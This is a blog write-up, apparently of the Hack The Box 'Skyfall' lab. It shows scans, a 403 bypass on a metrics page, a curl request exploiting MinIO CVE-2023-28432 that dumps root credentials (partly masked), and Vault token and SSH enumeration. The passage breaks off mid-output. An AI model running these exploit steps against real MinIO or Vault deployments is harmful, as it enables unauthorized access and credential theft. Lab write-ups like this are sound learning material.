Minio on CrippledMind's InfoSec Journalhttps://crippledmind-infosec-journal.netlify.app/tags/minio/Recent content in Minio on CrippledMind's InfoSec JournalHugo -- gohugo.ioen-usMon, 08 Jul 2024 22:53:43 +0530Skyfallhttps://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/Mon, 08 Jul 2024 22:53:43 +0530https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/<h2 id="introduction">Introduction </h2><ul> <li><strong>Machine Name:</strong> Skyfall</li> <li><strong>IP Address:</strong> 10.10.11.254</li> <li><strong>Difficulty:</strong> Insane</li> </ul> <h2 id="information-gathering">Information Gathering </h2><p>I started scan with <a class="link" href="https://github.com/RustScan/RustScan" target="_blank" rel="noopener" >Rustscan</a>. There were only two ports open.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">rustscan</span> <span class="c1">--ulimit 5000 -r 1-65535 -a $IP -- -T4 -Pn -A | tee -a scan.txt</span> </span></span><span class="line"><span class="cl"><span class="n">PORT</span> <span class="n">STATE</span> <span class="n">SERVICE</span> <span class="n">REASON</span> <span class="n">VERSION</span> </span></span><span class="line"><span class="cl"><span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">ssh</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">OpenSSH</span> <span class="mf">8.9</span><span class="n">p1</span> <span class="n">Ubuntu</span> <span class="mi">3</span><span class="n">ubuntu0</span><span class="mf">.6</span> <span class="p">(</span><span class="n">Ubuntu</span> <span class="n">Linux</span><span class="p">;</span> <span class="n">protocol</span> <span class="mf">2.0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">ssh</span><span class="o">-</span><span class="n">hostkey</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">256</span> <span class="mi">65</span><span class="p">:</span><span class="mi">70</span><span class="p">:</span><span class="n">f7</span><span class="p">:</span><span class="mi">12</span><span class="p">:</span><span class="mi">47</span><span class="p">:</span><span class="mi">07</span><span class="p">:</span><span class="mi">3</span><span class="n">a</span><span class="p">:</span><span class="mi">88</span><span class="p">:</span><span class="mi">8</span><span class="n">e</span><span class="p">:</span><span class="mi">27</span><span class="p">:</span><span class="n">e9</span><span class="p">:</span><span class="n">cb</span><span class="p">:</span><span class="mi">44</span><span class="p">:</span><span class="mi">5</span><span class="n">d</span><span class="p">:</span><span class="mi">10</span><span class="p">:</span><span class="n">fb</span> <span class="p">(</span><span class="n">ECDSA</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">ecdsa</span><span class="o">-</span><span class="n">sha2</span><span class="o">-</span><span class="n">nistp256</span> <span class="n">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCVqvI8vGs8EIUAAUiRze8kfKmYh9ETTUei3zRd1wWWLRBjSm</span><span class="o">+</span><span class="n">soBLfclIUP69cNtQOa961nyt2</span><span class="o">/</span><span class="n">BOwuR35cLR4</span><span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">256</span> <span class="mi">74</span><span class="p">:</span><span class="mi">48</span><span class="p">:</span><span class="mi">33</span><span class="p">:</span><span class="mi">07</span><span class="p">:</span><span class="n">b7</span><span class="p">:</span><span class="mi">88</span><span class="p">:</span><span class="mi">9</span><span class="n">d</span><span class="p">:</span><span class="mi">32</span><span class="p">:</span><span class="mi">0</span><span class="n">e</span><span class="p">:</span><span class="mi">3</span><span class="n">b</span><span class="p">:</span><span class="n">ec</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="n">aa</span><span class="p">:</span><span class="n">b4</span><span class="p">:</span><span class="n">c8</span><span class="p">:</span><span class="n">fe</span> <span class="p">(</span><span class="n">ED25519</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_ssh</span><span class="o">-</span><span class="n">ed25519</span> <span class="n">AAAAC3NzaC1lZDI1NTE5AAAAINk0VgEkDNZoIJwcG5LEVZDZkEeSRHLBmAOtd</span><span class="o">/</span><span class="n">pduzRW</span> </span></span><span class="line"><span class="cl"><span class="mi">80</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">http</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">nginx</span> <span class="mf">1.18.0</span> <span class="p">(</span><span class="n">Ubuntu</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">title</span><span class="p">:</span> <span class="n">Skyfall</span> <span class="o">-</span> <span class="n">Introducing</span> <span class="n">Sky</span> <span class="n">Storage</span><span class="err">!</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">http</span><span class="o">-</span><span class="n">methods</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_</span> <span class="n">Supported</span> <span class="n">Methods</span><span class="p">:</span> <span class="n">GET</span> <span class="n">HEAD</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">favicon</span><span class="p">:</span> <span class="n">Unknown</span> <span class="n">favicon</span> <span class="n">MD5</span><span class="p">:</span> <span class="n">FED84E16B6CCFE88EE7FFAAE5DFEFD34</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">server</span><span class="o">-</span><span class="n">header</span><span class="p">:</span> <span class="n">nginx</span><span class="o">/</span><span class="mf">1.18.0</span> <span class="p">(</span><span class="n">Ubuntu</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">Service</span> <span class="n">Info</span><span class="p">:</span> <span class="n">OS</span><span class="p">:</span> <span class="n">Linux</span><span class="p">;</span> <span class="n">CPE</span><span class="p">:</span> <span class="n">cpe</span><span class="p">:</span><span class="o">/</span><span class="n">o</span><span class="p">:</span><span class="n">linux</span><span class="p">:</span><span class="n">linux_kernel</span> </span></span></code></pre></div><h3 id="port-80">Port 80 </h3><p>When I go to the website, looking around found the possible domain given in the users section. I also noted down the users name in a list in case brute forcing has to be done.</p> <!-- ------------------------------------------------------------------------------------------ --> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">jbond </span></span><span class="line"><span class="cl">askyy </span></span><span class="line"><span class="cl">btanner </span></span></code></pre></div><p>Now looking again, I found a contact form. I tried exploiting it, but the form does not do anything useful. When submit is clicked, it just gets the home page with the details in query parameters added.</p> <p>Another endpoint <code>try our demo</code> seems interesting. This opens up a subdomain <code>demo</code>. Added it to <code>/etc/hosts</code>. A login page which gives default creds <code>guest\guest</code> to login.</p> <p>Upon login, I could see many attack points. There were forms, file upload and url query. I tried for xss to steal sessions but none of them worked. I tried for malicious file upload. But i was not able to make the server run that, it was just downloading it. There were two other paths, <code>beta</code> and <code>metrics</code>. But both of them gave <code>4**</code> error.</p> <p>Now since this is an insane box, I went on to try again on those forms, file upload etc. I found out that the app is made from flask. So tried even with that using hacktricks.</p> <div style="display: flex; justify-content: space-between;"> <img src="flask.png" alt="Image 1" style="width: 48%;"/> <img src="pythonpoint.png" alt="Image 2" style="width: 48%;"/> </div> <p>But after 2-3 hours, I gave up!!! 🫠🫠</p> <p>After some needed break from this, thinking and remembering all info I know of enumeration, I luckily remembered that, sometimes restricted paths can be bypassed with methods like <code>HTTP Methods</code> fuzzing, different <code>letter casings</code>, different <code>Protocol Version</code> etc. All these can be found in <a class="link" href="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses" target="_blank" rel="noopener" >Bypass hacktricks</a>. I tried some of the methods manually but nothing was working, there were automated tools given in the references. Yessss!!! It was a success. One of the tools:<a class="link" href="https://github.com/lobuhi/byp4xx" target="_blank" rel="noopener" >Bypass 4xx errors</a> found the bypass by appending <code>%0A</code>. Another tool <a class="link" href="https://github.com/devploit/nomore403" target="_blank" rel="noopener" >nomore403</a> I found by searching was also successful in finding this.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">nomore403</span> <span class="o">-</span><span class="n">f</span> <span class="o">~/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">nomore403</span><span class="o">/</span><span class="n">payloads</span><span class="o">/</span> <span class="o">-</span><span class="n">H</span> <span class="s1">&#39;Cookie: session=&lt;token_value&gt;&#39;</span> <span class="o">-</span><span class="n">u</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">demo</span><span class="o">.</span><span class="n">skyfall</span><span class="o">.</span><span class="n">htb</span><span class="o">/</span><span class="n">metrics</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="err">❯</span> <span class="o">./</span><span class="n">byp4xx</span> <span class="o">--</span><span class="nb">all</span> <span class="o">-</span><span class="n">xV</span> <span class="o">-</span><span class="n">xH</span> <span class="o">-</span><span class="n">xUA</span> <span class="o">-</span><span class="n">xD</span> <span class="o">-</span><span class="n">xS</span> <span class="o">-</span><span class="n">xM</span> <span class="o">-</span><span class="n">xX</span> <span class="o">-</span><span class="n">H</span> <span class="s1">&#39;Cookie: session=&lt;token_value&gt;&#39;</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">demo</span><span class="o">.</span><span class="n">skyfall</span><span class="o">.</span><span class="n">htb</span><span class="o">/</span><span class="n">metrics</span> </span></span></code></pre></div><br> <div style="display: flex; justify-content: space-between;"> <img src="bypassed.png" alt="Image 1" style="width: 64%;"/> <img src="bypassedtwo.png" alt="Image 2" style="width: 34%;"/> </div> <p>Bypassing the page, I land in a frontend for minio metrics. Looking at the entries, I found several useful information. <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/minioversion.png" width="2028" height="78" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/minioversion_hu771d4d0023d367cbe9a3231a6dbfac72_25878_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/minioversion_hu771d4d0023d367cbe9a3231a6dbfac72_25878_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="2600" data-flex-basis="6240px" > <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/subdomain.png" width="2192" height="90" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/subdomain_huc3eb80a56ee734e4e9d493265e9a90cf_24808_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/subdomain_huc3eb80a56ee734e4e9d493265e9a90cf_24808_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="2435" data-flex-basis="5845px" ></p> <p>I added the subdomain to <code>/etc/hosts</code>. Going to the path, I found minio metrics.</p> <div class="notice notice-info"> MinIO is a high-performance, S3 compatible object store. It is built for large scale AI/ML, data lake and database workloads. It is software-defined and runs on any cloud or on-premises infrastructure. MinIO is dual-licensed under open source GNU AGPL v3 and a commercial enterprise license. </div> <p>So now to try to read the storage, I searched online for a potential vulnerability for this version to have the necessary permissions, alas!!! I found one <a class="link" href="https://vulners.com/nuclei/NUCLEI:CVE-2023-28432" target="_blank" rel="noopener" >Minio vuln</a>🥳. According to the post, a post request to the endpoint <code>/minio/bootstrap/v1/verify</code> would return all the environment variables of minio. I did a curl request and got the data. 🎉</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">curl</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">prd23</span><span class="o">-</span><span class="n">s3</span><span class="o">-</span><span class="n">backend.skyfall</span><span class="p">.</span><span class="n">htb</span><span class="o">/</span><span class="n">minio</span><span class="o">/</span><span class="n">bootstrap</span><span class="o">/</span><span class="n">v1</span><span class="o">/</span><span class="n">verify</span> <span class="o">-</span><span class="n">d</span> <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"><span class="p">{</span><span class="s2">&#34;MinioEndpoints&#34;</span><span class="p">:[{</span><span class="s2">&#34;Legacy&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;SetCount&#34;</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span><span class="s2">&#34;DrivesPerSet&#34;</span><span class="p">:</span><span class="mi">4</span><span class="p">,</span><span class="s2">&#34;Endpoints&#34;</span><span class="p">:[{</span><span class="s2">&#34;Scheme&#34;</span><span class="p">:</span><span class="s2">&#34;http&#34;</span><span class="p">,</span><span class="s2">&#34;Opaque&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;User&#34;</span><span class="p">:</span><span class="n">null</span><span class="p">,</span><span class="s2">&#34;Host&#34;</span><span class="p">:</span><span class="s2">&#34;minio-node1:9000&#34;</span><span class="p">,</span><span class="s2">&#34;Path&#34;</span><span class="p">:</span><span class="s2">&#34;/data1&#34;</span><span class="p">,</span><span class="s2">&#34;RawPath&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;OmitHost&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;ForceQuery&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;RawQuery&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;Fragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;RawFragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;IsLocal&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">},{</span><span class="s2">&#34;Scheme&#34;</span><span class="p">:</span><span class="s2">&#34;http&#34;</span><span class="p">,</span><span class="s2">&#34;Opaque&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;User&#34;</span><span class="p">:</span><span class="n">null</span><span class="p">,</span><span class="s2">&#34;Host&#34;</span><span class="p">:</span><span class="s2">&#34;minio-node2:9000&#34;</span><span class="p">,</span><span class="s2">&#34;Path&#34;</span><span class="p">:</span><span class="s2">&#34;/data1&#34;</span><span class="p">,</span><span class="s2">&#34;RawPath&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;OmitHost&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;ForceQuery&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;RawQuery&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;Fragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;RawFragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;IsLocal&#34;</span><span class="p">:</span><span class="kc">true</span><span class="p">},{</span><span class="s2">&#34;Scheme&#34;</span><span class="p">:</span><span class="s2">&#34;http&#34;</span><span class="p">,</span><span class="s2">&#34;Opaque&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;User&#34;</span><span class="p">:</span><span class="n">null</span><span class="p">,</span><span class="s2">&#34;Host&#34;</span><span class="p">:</span><span class="s2">&#34;minio-node1:9000&#34;</span><span class="p">,</span><span class="s2">&#34;Path&#34;</span><span class="p">:</span><span class="s2">&#34;/data2&#34;</span><span class="p">,</span><span class="s2">&#34;RawPath&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;OmitHost&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;ForceQuery&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;RawQuery&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;Fragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;RawFragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;IsLocal&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">},{</span><span class="s2">&#34;Scheme&#34;</span><span class="p">:</span><span class="s2">&#34;http&#34;</span><span class="p">,</span><span class="s2">&#34;Opaque&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;User&#34;</span><span class="p">:</span><span class="n">null</span><span class="p">,</span><span class="s2">&#34;Host&#34;</span><span class="p">:</span><span class="s2">&#34;minio-node2:9000&#34;</span><span class="p">,</span><span class="s2">&#34;Path&#34;</span><span class="p">:</span><span class="s2">&#34;/data2&#34;</span><span class="p">,</span><span class="s2">&#34;RawPath&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;OmitHost&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;ForceQuery&#34;</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="s2">&#34;RawQuery&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;Fragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;RawFragment&#34;</span><span class="p">:</span><span class="s2">&#34;&#34;</span><span class="p">,</span><span class="s2">&#34;IsLocal&#34;</span><span class="p">:</span><span class="kc">true</span><span class="p">}],</span><span class="s2">&#34;CmdLine&#34;</span><span class="p">:</span><span class="s2">&#34;http://minio-node{1...2}/data{1...2}&#34;</span><span class="p">,</span><span class="s2">&#34;Platform&#34;</span><span class="p">:</span><span class="s2">&#34;OS: linux | Arch: amd64&#34;</span><span class="p">}],</span><span class="s2">&#34;MinioEnv&#34;</span><span class="p">:{</span><span class="s2">&#34;MINIO_ACCESS_KEY_FILE&#34;</span><span class="p">:</span><span class="s2">&#34;access_key&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_BROWSER&#34;</span><span class="p">:</span><span class="s2">&#34;off&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_CONFIG_ENV_FILE&#34;</span><span class="p">:</span><span class="s2">&#34;config.env&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_KMS_SECRET_KEY_FILE&#34;</span><span class="p">:</span><span class="s2">&#34;kms_master_key&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_PROMETHEUS_AUTH_TYPE&#34;</span><span class="p">:</span><span class="s2">&#34;public&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_ROOT_PASSWORD&#34;</span><span class="p">:</span><span class="s2">&#34;Gkpjk********3oRx0&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_ROOT_PASSWORD_FILE&#34;</span><span class="p">:</span><span class="s2">&#34;secret_key&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_ROOT_USER&#34;</span><span class="p">:</span><span class="s2">&#34;5GrE1********ZaIww&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_ROOT_USER_FILE&#34;</span><span class="p">:</span><span class="s2">&#34;access_key&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_SECRET_KEY_FILE&#34;</span><span class="p">:</span><span class="s2">&#34;secret_key&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_UPDATE&#34;</span><span class="p">:</span><span class="s2">&#34;off&#34;</span><span class="p">,</span><span class="s2">&#34;MINIO_UPDATE_MINISIGN_PUBKEY&#34;</span><span class="p">:</span><span class="s2">&#34;RWTx5Zr1tiHQLwG9keckT0c45M3AGeHD6IvimQHpyRywVWGbP1aVSGav&#34;</span><span class="p">}}</span> </span></span></code></pre></div><p>Looking at the <a class="link" href="https://min.io/docs/minio/linux/reference/minio-mc.html" target="_blank" rel="noopener" >Minio Docs</a>, I found a way to use these creds. To interact with the storage a cli tool <a class="link" href="https://min.io/docs/minio/linux/reference/minio-mc.html?ref=docs" target="_blank" rel="noopener" >mc</a> is also available. To connect to the storage we need to add an alias with the root user and root password.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">mc</span> <span class="n">alias</span> <span class="n">set</span> <span class="n">ALIAS</span> <span class="n">HOSTNAME</span> <span class="n">ACCESS_KEY</span> <span class="n">SECRET_KEY</span> </span></span></code></pre></div><p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/mcaliasadd.png" width="2868" height="816" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/mcaliasadd_hu6df476d2a2255e00bb0b188bb137a9ab_159247_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/mcaliasadd_hu6df476d2a2255e00bb0b188bb137a9ab_159247_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="351" data-flex-basis="843px" > Now using <code>mc alias list</code>, i can see the endpoint is now accessible. Now mc has very similar commands to unix system to interact with files. I started enumerating the storage. Now in the docs I saw a <code>version</code> flag also which shows that similar to github, versioning of files might be done.</p> <div style="display: flex; justify-content: space-between;"> <img src="mcversioning.png" alt="Image 1" style="width: 34%;"/> <img src="mcversioningtwo.png" alt="Image 2" style="width: 64%;"/> </div> So I listed all the versions of available files in storage. <br> <div style="display: flex; justify-content: space-between;"> <img src="mclistall.png" alt="Image 1" style="width: 100%;"/> </div> <br> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">mc</span> <span class="n">get</span> <span class="o">--</span><span class="n">vid</span> <span class="o">&lt;</span><span class="n">ver_no</span><span class="o">&gt;</span> <span class="n">juicy</span><span class="o">/</span><span class="n">askyy</span><span class="o">/</span><span class="n">home_backup</span><span class="o">.</span><span class="n">tar</span><span class="o">.</span><span class="n">gz</span> <span class="o">.</span> </span></span></code></pre></div><p>Going through all the files, every version, I found some juicy info. Some variable entries in the <code>.bashrc</code> file, and a terraform-generator.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">export</span> <span class="n">VAULT_API_ADDR</span><span class="o">=</span><span class="s2">&#34;http://********.skyfall.htb&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">export</span> <span class="n">VAULT_TOKEN</span><span class="o">=</span><span class="s2">&#34;hvs.CAESIJlU**********NMnZhakZDRlZGdGVzN09xYkxTQVE&#34;</span> </span></span></code></pre></div><p>Looking on google for what both might say lead me to <a class="link" href="https://developer.hashicorp.com/vault" target="_blank" rel="noopener" >HashiCorp</a>.</p> <div style="display: flex; justify-content: space-between;"> <img src="hashicorp.png" alt="Image 1" style="width: 100%;"/> </div> <div class="notice notice-info"> <span style="color: #d461e8">Vault</span>: Secure, store, and tightly control access to tokens, passwords, certificates, encryption keys for protecting secrets, and other sensitive data using a UI, CLI, or HTTP API. </div> <p>So now, time to enumerate the vault. I found out that there is a <a class="link" href="https://developer.hashicorp.com/vault/install" target="_blank" rel="noopener" >CLI tool</a> also available to interact with the vault. Looking at the help menu, noticed something, 😁😁 <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/vaulthelp.png" width="1452" height="212" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/vaulthelp_hu1ef65991b151b516cefe0085a3976910_44559_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/vaulthelp_hu1ef65991b151b516cefe0085a3976910_44559_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="684" data-flex-basis="1643px" > Now since, there was only port 22 left to be enumerated, I looked for the documentation to use this vault ssh. <div class="notice notice-info"> The <span style="color: #d461e8">Vault SSH</span> secrets engine provides secure authentication and authorization for access to machines via the SSH protocol. The Vault SSH secrets engine helps manage access to machine infrastructure, providing several ways to issue SSH credentials. ===> Meaning instead of password, I can use the OTP to login. </div> I added the earlier found variables to my <code>.bashrc</code> and sourced it. To test, I used the connection, I used the <code>status</code> argument, but met with an error, which also gave me a fix to correct the error🫠. <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/vaultaddr.png" width="2786" height="486" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/vaultaddr_hu6cadbec797607baf3b125ae303347bd2_84267_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/vaultaddr_hu6cadbec797607baf3b125ae303347bd2_84267_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="573" data-flex-basis="1375px" > Now running the <code>vault status</code> command again, I could see the information.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">vault</span> <span class="n">token</span> <span class="n">lookup</span> </span></span><span class="line"><span class="cl"><span class="n">Key</span> <span class="n">Value</span> </span></span><span class="line"><span class="cl"><span class="c1">--- -----</span> </span></span><span class="line"><span class="cl"><span class="n">accessor</span> <span class="n">rByv1coOBC9ITZpzqbDtTUm8</span> </span></span><span class="line"><span class="cl"><span class="n">creation_time</span> <span class="mi">1699563963</span> </span></span><span class="line"><span class="cl"><span class="n">creation_ttl</span> <span class="mi">768</span><span class="n">h</span> </span></span><span class="line"><span class="cl"><span class="n">display_name</span> <span class="n">token</span><span class="o">-</span><span class="n">askyy</span> </span></span><span class="line"><span class="cl"><span class="n">entity_id</span> <span class="n">n</span><span class="o">/</span><span class="n">a</span> </span></span><span class="line"><span class="cl"><span class="n">expire_time</span> <span class="mi">2073</span><span class="o">-</span><span class="mi">10</span><span class="o">-</span><span class="mi">27</span><span class="n">T21</span><span class="p">:</span><span class="mi">06</span><span class="p">:</span><span class="mf">03.043964076</span><span class="n">Z</span> </span></span><span class="line"><span class="cl"><span class="n">explicit_max_ttl</span> <span class="mi">0</span><span class="n">s</span> </span></span><span class="line"><span class="cl"><span class="n">id</span> <span class="n">hvs</span><span class="p">.</span><span class="o">******************</span><span class="n">zN09xYkxTQVE</span> </span></span><span class="line"><span class="cl"><span class="n">issue_time</span> <span class="mi">2023</span><span class="o">-</span><span class="mi">11</span><span class="o">-</span><span class="mi">09</span><span class="n">T21</span><span class="p">:</span><span class="mi">06</span><span class="p">:</span><span class="mf">03.445155372</span><span class="n">Z</span> </span></span><span class="line"><span class="cl"><span class="n">last_renewal</span> <span class="mi">2023</span><span class="o">-</span><span class="mi">11</span><span class="o">-</span><span class="mi">20</span><span class="n">T16</span><span class="p">:</span><span class="mi">43</span><span class="p">:</span><span class="mf">24.043964166</span><span class="n">Z</span> </span></span><span class="line"><span class="cl"><span class="n">last_renewal_time</span> <span class="mi">1700498604</span> </span></span><span class="line"><span class="cl"><span class="n">meta</span> <span class="o">&lt;</span><span class="kc">nil</span><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="n">num_uses</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"><span class="n">orphan</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"><span class="n">path</span> <span class="n">auth</span><span class="o">/</span><span class="n">token</span><span class="o">/</span><span class="n">create</span> </span></span><span class="line"><span class="cl"><span class="n">policies</span> <span class="p">[</span><span class="n">default</span> <span class="n">developers</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">renewable</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"><span class="n">ttl</span> <span class="mi">432193</span><span class="n">h34m22s</span> </span></span><span class="line"><span class="cl"><span class="n">type</span> <span class="n">service</span> </span></span></code></pre></div><p>The token belongs to <code>askyy</code> user, so will be the ssh session then. 🙌 Looking at various articles: <a class="link" href="https://irezyigit.medium.com/vault-part9-deeper-look-into-tokens-72da0dceb5ef" target="_blank" rel="noopener" >help-one</a> <a class="link" href="https://developer.hashicorp.com/vault/docs/secrets/ssh/one-time-ssh-passwords" target="_blank" rel="noopener" >help-two</a> on how to interact with the vault. I found</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">vault</span> <span class="n">path</span><span class="o">-</span><span class="n">help</span> <span class="n">ssh</span><span class="o">/</span> </span></span><span class="line"><span class="cl"><span class="o">##</span> <span class="n">DESCRIPTION</span> </span></span><span class="line"><span class="cl"><span class="n">The</span> <span class="n">SSH</span> <span class="n">backend</span> <span class="n">generates</span> <span class="n">credentials</span> <span class="n">allowing</span> <span class="n">clients</span> <span class="n">to</span> <span class="n">establish</span> <span class="n">SSH</span> </span></span><span class="line"><span class="cl"><span class="n">connections</span> <span class="n">to</span> <span class="n">remote</span> <span class="n">hosts</span><span class="p">.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">There</span> <span class="n">are</span> <span class="n">two</span> <span class="n">variants</span> <span class="n">of</span> <span class="n">the</span> <span class="n">backend</span><span class="p">,</span> <span class="n">which</span> <span class="n">generate</span> <span class="n">different</span> <span class="n">types</span> <span class="n">of</span> </span></span><span class="line"><span class="cl"><span class="n">credentials</span><span class="p">:</span> <span class="n">One</span><span class="o">-</span><span class="n">Time</span> <span class="n">Passwords</span> <span class="p">(</span><span class="n">OTPs</span><span 